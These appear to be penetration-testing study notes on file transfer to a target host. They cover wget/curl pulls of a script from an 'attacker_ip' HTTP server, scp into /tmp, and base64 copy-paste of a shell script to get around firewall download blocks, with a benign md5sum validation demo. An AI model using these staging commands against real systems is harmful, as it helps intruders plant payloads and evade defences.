- Various methods for moving files to/from a target host
  - python HTTP server on attacker machine and `wget` or `curl` on target
  - `meterpreter` shell built-in `upload` command

# `python` web server

```bash
#set up HTTP server on attacker machine
cd /tmp #change to the directory with the script/file to be sent to target
ip a #lists attacker machine IP address
python3 -m http.server <port>

#download command A on target
wget http://attacker_ip:port/script.sh

#download command B on target
curl http://attacker_ip:port/script.sh -o script.sh
```

# `scp`

- secure copy command that uses `ssh` to move files from A to B

```bash
scp /local-path-to/script.sh user@target_ip:/tmp/script.sh
#default /tmp perms are typically 1777 (sticky bit!), so it's used as a staging area on attacker/target
```

# `base64` encoding

- commonly used to work around FW protections that may disable downloading
- binary-to-text encoding scheme that transforms binary data into a sequence of printable chars that is limited to a set of 64 unique chars

```bash
#encode shell script on attacker, which is printed to stdout
base64 shell.sh -w 0 #-w 0 option disables line wrapping

#copy encoded shell script from stdout
#paste encoded shell script into target terminal, then decode on target
echo <base64_string> | base64 -d > shell.sh
```

# Validating File Transfers

- run the `file` command on the transferred shell script
  - confirm it's an `ELF` binary
- run `md5sum` prior to and after transfer and compare results
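
The `md5sum` check above applied to the `base64` copy/paste method, as an added example that is not part of the original notes. The function names (`md5_of`, `verify_transfer`, `roundtrip_demo`) and the sample file are assumptions; the transfer is simulated locally, including a paste that lost its last characters.

```bash
#!/usr/bin/env bash
# Added example: helper names and file names are hypothetical, data is constructed.

# Print only the hash field of md5sum's output.
md5_of() { md5sum "$1" | cut -d' ' -f1; }

# verify_transfer <original> <received>
# 0 = hashes match, 1 = mismatch, 2 = a file is missing or unreadable.
verify_transfer() {
    [ -r "$1" ] && [ -r "$2" ] || return 2
    local before after
    before=$(md5_of "$1")
    after=$(md5_of "$2")
    printf 'before: %s\nafter:  %s\n' "$before" "$after"
    [ "$before" = "$after" ]
}

# roundtrip_demo <workdir>
# Simulates the copy/paste transfer locally, then a paste that lost its tail.
roundtrip_demo() {
    local dir="$1" encoded
    # constructed sample file that includes non-printable bytes
    printf '#!/bin/sh\necho transferred\n\000\001\002\377' > "$dir/script.sh"
    encoded=$(base64 -w 0 "$dir/script.sh")

    # intact paste: decoded copy must hash the same as the source
    printf '%s\n' "$encoded" | base64 -d > "$dir/received.sh"
    verify_transfer "$dir/script.sh" "$dir/received.sh" || return 1

    # truncated paste: the last 8 characters never made it into the terminal
    printf '%s\n' "${encoded%????????}" | base64 -d > "$dir/truncated.sh" 2>/dev/null
    if verify_transfer "$dir/script.sh" "$dir/truncated.sh"; then
        return 1    # a truncated copy must not validate
    fi
    return 0
}

# Run the demo in a scratch directory.
workdir=$(mktemp -d)
roundtrip_demo "$workdir" && echo "intact copy validated, truncated copy rejected"
rm -rf "$workdir"
```

The truncated string still decodes without an error from `base64 -d`, so the hash comparison is the only step that catches the short file.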